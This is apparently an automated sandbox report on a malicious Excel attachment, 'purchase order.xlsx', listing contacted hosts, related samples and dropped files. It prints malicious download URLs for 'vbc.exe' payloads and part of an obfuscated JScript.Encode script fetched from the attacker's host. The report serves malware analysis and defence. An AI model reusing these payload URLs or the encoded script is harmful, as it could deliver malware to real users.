                                                                                https://ncus.contentsync.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                  		high
                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                    		high
                                                                                    http://weather.service.msn.com/data.aspx34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                      		high
                                                                                      https://apis.live.net/v5.0/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                        		high
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                          		high
                                                                                          https://messaging.lifecycle.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                            		high
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                              		high
                                                                                              https://management.azure.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                		high
                                                                                                https://outlook.office365.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                  		high
                                                                                                  https://wus2.contentsync.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://incidents.diagnostics.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                    		high
                                                                                                    https://clients.config.office.net/user/v1.0/ios34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                      		high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmedia34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                        		high
                                                                                                        https://o365auditrealtimeingestion.manage.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com/api/v1.0/me/Activities34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                            		high
                                                                                                            https://api.office.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                              		high
                                                                                                              https://incidents.diagnosticssdf.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                		high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policies34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                  		high
                                                                                                                  https://entitlement.diagnostics.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                    		high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                      		high
                                                                                                                      https://substrate.office.com/search/api/v2/init34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                        		high
                                                                                                                        https://outlook.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                          		high
                                                                                                                          https://storage.live.com/clientlogs/uploadlocation34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                              		high
                                                                                                                              https://webshell.suite.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                		high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistory34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://management.azure.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://messaging.lifecycle.office.com/getcustommessage1634C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://clients.config.office.net/c2r/v1.0/InteractiveInstallation34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorize34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://graph.windows.net/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://api.powerbi.com/beta/myorg/imports34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://devnull.onenote.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://messaging.action.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://ncus.pagecontentsync.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://messaging.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                          		high

                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public IPs

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          172.245.119.48
                                                                                                                                                          		unknownUnited States
                                                                                                                                                          		36352AS-COLOCROSSINGUSfalse

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                          Analysis ID:653502
                                                                                                                                                          Start date and time: 28/06/202210:43:182022-06-28 10:43:18 +02:00
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 6m 9s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Sample file name:purchase order.xlsx
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                                                                          Number of analysed new started processes analysed:29
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal68.expl.winXLSX@10/24@0/1
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:Failed
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .xlsx
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer

                                                                                                                                                          Warnings

                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.76.34, 52.109.88.37, 20.54.89.106, 52.242.101.226, 52.152.110.14, 20.223.24.244
                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • VT rate limit hit for: purchase order.xlsx

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          No simulations

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          172.245.119.48277.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.245.119.48/277/vbc.exe
                                                                                                                                                          PO 009_011.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.245.119.48/134/vbc.exe
                                                                                                                                                          purchase order.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.245.119.48/233/vbc.exe

                                                                                                                                                          Domains

                                                                                                                                                          No context

                                                                                                                                                          ASNs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          AS-COLOCROSSINGUSsipari#U015f S.A.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.168.194
                                                                                                                                                          NMB Transaction Advice Slip.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.81.50
                                                                                                                                                          Payment Slip.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.168.194
                                                                                                                                                          PO 28.06.2022.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 104.168.33.68
                                                                                                                                                          Ponudba_688459439674636.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.168.194
                                                                                                                                                          CO357787.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.168.194
                                                                                                                                                          Enquiry.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.91.239
                                                                                                                                                          gZHoNqzhnkAsyncnew.jsGet hashmaliciousBrowse
                                                                                                                                                          • 104.168.33.53
                                                                                                                                                          DME.png.docxGet hashmaliciousBrowse
                                                                                                                                                          • 192.3.13.67
                                                                                                                                                          shipping document.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.168.194
                                                                                                                                                          fddaeygXLjAsync.jsGet hashmaliciousBrowse
                                                                                                                                                          • 104.168.33.53
                                                                                                                                                          Shipping documents for PO 810884.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.3.245.147
                                                                                                                                                          56.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.12.81.47
                                                                                                                                                          Alfa Laval Aalborg AS Overdue Invoice .xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.168.194
                                                                                                                                                          FAX From +271120073893.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.168.194
                                                                                                                                                          RFQ 1000712834.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.168.194
                                                                                                                                                          cYqx6CLuq4.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.227.225.175
                                                                                                                                                          Delivery Refrence .xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 23.95.34.14
                                                                                                                                                          New Order No 75674834700.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 104.168.33.66
                                                                                                                                                          Offer basis in USDkg - PRE TREATMENT PACKAGE.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 104.168.32.43

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dllWF0SlQWKr1.docxGet hashmaliciousBrowse
                                                                                                                                                            V3g2Pfu707.docxGet hashmaliciousBrowse
                                                                                                                                                              5YMh6S8QVr.docxGet hashmaliciousBrowse
                                                                                                                                                                ZDhoKQk8G6.docxGet hashmaliciousBrowse
                                                                                                                                                                  TranQuangDai.docxGet hashmaliciousBrowse
                                                                                                                                                                    doc782.docxGet hashmaliciousBrowse
                                                                                                                                                                      68101181_048154.imgGet hashmaliciousBrowse
                                                                                                                                                                        doc782.docxGet hashmaliciousBrowse
                                                                                                                                                                          doc1712.docxGet hashmaliciousBrowse
                                                                                                                                                                            R346ltaP9w.rtfGet hashmaliciousBrowse
                                                                                                                                                                              VIP Invitation to Doha Expo 2023.docxGet hashmaliciousBrowse
                                                                                                                                                                                WykHEO9BQN.rtfGet hashmaliciousBrowse
                                                                                                                                                                                  lol666 (2).batGet hashmaliciousBrowse
                                                                                                                                                                                    EISPv0c56U.docGet hashmaliciousBrowse
                                                                                                                                                                                      mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                                                        mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                                                          05-2022-0438.docGet hashmaliciousBrowse

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\34C7A8FE-4DF9-41DA-97CE-FBD957286E8B

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):149126
                                                                                                                                                                                            Entropy (8bit):5.356744655596469
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:6cQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvidkXx5ETLKz6e:FJQ9DQC+zcXwI
                                                                                                                                                                                            MD5:6FF92A7CC58B007B5CF50798752F5FF6
                                                                                                                                                                                            SHA1:B1500193F727C0943683A97216E28A9CEB39E45F
                                                                                                                                                                                            SHA-256:3BA0725357DE15FE94FA3B623E1C08191CEFF322EB8EC431404F306F15D8B7F4
                                                                                                                                                                                            SHA-512:0E67CE141AD773AB8C7D15AED840FE3DEB50D67DAF2AEE2B372CF46D309CB7BC3686076B8B167C0BB10DC569B58893F556F169430EA2A2C8F403596912415911
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-28T08:44:30">.. Build: 16.0.15420.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5A2016E7.png

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:PNG image data, 130 x 187, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):16424
                                                                                                                                                                                            Entropy (8bit):7.9810223666914055
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:rGO9ao+FvCVT/82OoZJh+5thcR6zPOkCpVP9o+axwZFl+v:6Olyc8cNpVlKoW
                                                                                                                                                                                            MD5:86212DE909C5057FF80D28C6BCDA1B97
                                                                                                                                                                                            SHA1:7B4846994D2A926D32AE44464802C8862D0D89AD
                                                                                                                                                                                            SHA-256:B796FFD015039600D93F191B42361B22A940F84BAADA5E4E7A9BD62829458BD0
                                                                                                                                                                                            SHA-512:DE7F37E3BF5A8E07BB5E323EA9A767CEE3856925DA332A4858C5D44A1B9635D9660BFE809BE6F6A8CCCB4EA3CD578CBE395A7B25AC30A89476353B898A585F4B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview:.PNG........IHDR.............&......[iCCPICC Profile..x..Xy8U]._.....LNfB.."2.C..q...q...R...TR.SH"c2.HH.YI.I.....z.o.....[.u.......}.{....>|pp....H .-...v..X.1......&.{h.....,....0.([...[o.'_l#K..\..L.;...P.C3.a..@R0.....(.m.[Sp.)....P.......0."Z[j....{......K..w....@.J..%.@=.cu..Pwx....#.=... ....`..0/..L.u.Wa,L9.x.G@#.*p....s.Z.*.....oN....D..p..,w.........5......nggI..-...........\..o.h.p.#....7.u..........N.%...2....H.d?..:.*..D.O.G.N.........Ff..h.r.......{QPZ.[.R.K\W...~.(..C.8..r%..g...h......##..j.G..K4...j.....sO..^.~.....F..=&C..f3....4V.."6.m.NX.9..8.:F;.;'.Lu..z...v...Y.U...3......x.`.D.N..G|..O...9|!b)r-.:M...#.{...Y...s...P._w..R._..M..I...//.......22.<.:..=K.:........^..zW*G?.-/.^V~.......B."....%..>ea......*..7V5T..T.>....$.!..3.F.&./._5?|q..U...m.eI..+.W..........G.=4=U.n}L}......O.....Z.CG.G.G.^[.a~.7...|.a.........]?.}h.:5........O..&f.?.}Q...../_......._...k...U-...........9......_..A.P).(b.y....F.R....yK;G..........v........g...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7092770.emf

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):344
                                                                                                                                                                                            Entropy (8bit):2.446884075910387
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:YDRX/5OQHzqEkNslqg6lnW6kK0XgtjuYVz2tYVzfvt8J:Y1ROo6ClqgOnVp0NYVxVjw
                                                                                                                                                                                            MD5:00022229E61960C6F67FEA5ABD7CC7BF
                                                                                                                                                                                            SHA1:95550373818BBB679D2388324C94A949CFFF90D5
                                                                                                                                                                                            SHA-256:CA521CE8E4A2C824905F74E45089E94D008E3E346439ECB9146AAD551C609A0F
                                                                                                                                                                                            SHA-512:CE17174A7CD5F6063151FF025F50C2DB959421A529B45358750C6722E10FBD1E073970AD1809D03E86BF58AA9752EEA286907EF53630321D50146EA6FEBDF8F4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:....l................................... EMF....X...........................8...X....................?......F...X...L...GDIC..........#s....4...............................................................................8...............8...................................%...........%...........0...........K...................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DB1DA0B1.emf

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):498420
                                                                                                                                                                                            Entropy (8bit):0.641121533751757
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:jXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:DXwBkNWZ3cjvmWa+VDO
                                                                                                                                                                                            MD5:B6B2AE798B3758B49D802640BD39AF32
                                                                                                                                                                                            SHA1:656AC44B76A94412C192609FBE730B73B238C3A9
                                                                                                                                                                                            SHA-256:6E281E82686640834CECC8BAECB83C1AEB68114A45299115D5B590E7C51E9332
                                                                                                                                                                                            SHA-512:375A29D725F6FD007BEE3C126165635DC89D16CAAB1FB0D5AD5AA87A1332E51EB55153D6216A954EA77E3B2DA11C35DAB2D428AAB7014B9813035964090F7DE8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................[$...(....f.[.@..%.......H...........,...RQ(]....................$Q(]........ ...Id.[........ ............d.[............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........8...X............8.[........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\document[1].htm

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):21741
                                                                                                                                                                                            Entropy (8bit):6.426960150522073
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:+z357eNbjcN0gKdG9iSrvx/oBqEq7LFGgsdHmYGvx:+pedjcP915/8nq7LFGndHOx
                                                                                                                                                                                            MD5:CDF5BDD4111E8CD5F0349DAFA4FD69D6
                                                                                                                                                                                            SHA1:93FBE5D73A10E5C80593BB765203B05642C38574
                                                                                                                                                                                            SHA-256:59AA679DE09E68BC33D33371FEEF67837410E0056C10A9D66D87F01F667DD006
                                                                                                                                                                                            SHA-512:7400E6CA2B650D0451EE923E2C0F036DEA165EE008BF1E50FECDD282794CF0F31975D4ED854E0440F314318C0E5AF99D0E5E048BBA636E3062D691B0101DB299
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:http://172.245.119.48/shipping_invc/document.html
                                                                                                                                                                                            Preview:<!DOCTyPE hTML>....<hTmL>....<bODy>....<scRipT .TyPE="Text/jsCRipt.Encode">....//**sTArT encode**....#@~^S1QAAA==@#@&@#@&^W1lYbW. tM+WP{PE\kOHr~P3PJU9P)rP,_~J&r9J~P3~J,J~Q,Jw^.9k)Mg6rP~3Pr/K&mr~P3PEPrPQ~rO/0rJ,P_,EKJ,P3PEPE~3PEs}.J,PQ~rZ2E~,_~J,E,_~rzhbDrP,QPrb\J,PQ~rPJ,QPr-Jr~QPrqD{.2E~,_~J~.WS?nWKJP~Q,J.s&J.'E,P3PJ[b&PJ,_~J,J~Q,Jq:mSmEx14\+DtKNxZGUD+EP,QPr6O\rPPQ~r+UEr~,_~rPrP_,J&P{~J~P3PE.Kh/.oWMsk^E~P3Pr+EP~Q,JxJ,~_,J*zD^`E~3PEqAav^c&2o`B]?HdKA: KA6O .1ZK[q.oTEQ,Z_lMTX%Q,;C)DYX%3BiPw%R!n:?OI&UT`,U5kY2sR1617+]KYBQ,;tlMD*R_$1u)IY*R_vs]6tA)/A.ckY]rgo`vQ]mul"D2cQEj8I\1Z8Am0,%}j1P(;FM(f9G}?zO83wY\?)x8pg3[Z1{9wNC(G!oe."3J."X12iTSqFs(.xsmsIo}sV;joI9:TcT9FD38MX9(($\^U5W(xjzKAF-Pb*383SkJZ~9mMoHjy.!&fZLpyt4m^1s[;*.(hVN4 "sF.8h9.B/C.to^&"4NVV%(V.c[!jX8k~B(x]5N_qoj.x\IV,f4s6-eqIj(T}a4M`Gj.l!`C]X(3D(PZX"N_928smo^3k/^&"zm.X.qVw!"XXqlq*TqA.fJAVE9oAZmk~.e:1w}X^oJilt8.`Lq^spebqoJiltP.jP`MoN}UAY1XzOjVs"m8IG^.jG&/Io.LK.#.xH"M1&8hX\e."i4Z}28VjW\/SkCC"T1fG7S.2&tkWz1Gj;H:2XJNpcd"o2HZO+e:tE\(4V(rSkBMj6NN

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                                            Entropy (8bit):3.09405754705922
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:etGSBm9pz1qlkCe745Q7GslPorPjvX5ekjV4gztkZfPy6Iv+SnOBWI+ycuZhNSGX:6Upqb927GslPIDRjyJP0Ok1ul7a3Xq
                                                                                                                                                                                            MD5:9AECF9FCAD18AD5C87157D7A648B6BD4
                                                                                                                                                                                            SHA1:C30F06A3A49A0F52ECC64FF544159AB46E09B084
                                                                                                                                                                                            SHA-256:884C79B3C442E367C47C28CE379460E8EC0849D4C4D6381657794F40B2A7CB67
                                                                                                                                                                                            SHA-512:CE0425D8EC6E3104A8E02DDD1A40D8B22F27CF600BF2D730AA29C904C6C619B2667784ECD66FFB8B9FC717C19293AC0D4877D3D0B0AFAC15A772E7C7A5683E74
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.11907740507641
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykGak7YnqqlXPN5Dlq5J:+RI+ycuZhNSGakSlXPNnqX
                                                                                                                                                                                            MD5:85E307F916985ED8227C37FD6EAAD243
                                                                                                                                                                                            SHA1:72F137CA124C6E97E4546458E2F076B75A2927DE
                                                                                                                                                                                            SHA-256:23C6B12E792794E645586D3E40359BDE672C6618968B96A525030C4D3F36F414
                                                                                                                                                                                            SHA-512:1C1D539D6631373D01238A80142B253EAEA39740955EE8E8B452645D69BFCA25D99CBEC10BE44D0A2DC4BFD52EFE5A972CEEA467CC385C0929410CB46D5CC307
                                                                                                                                                                                            Malicious:false
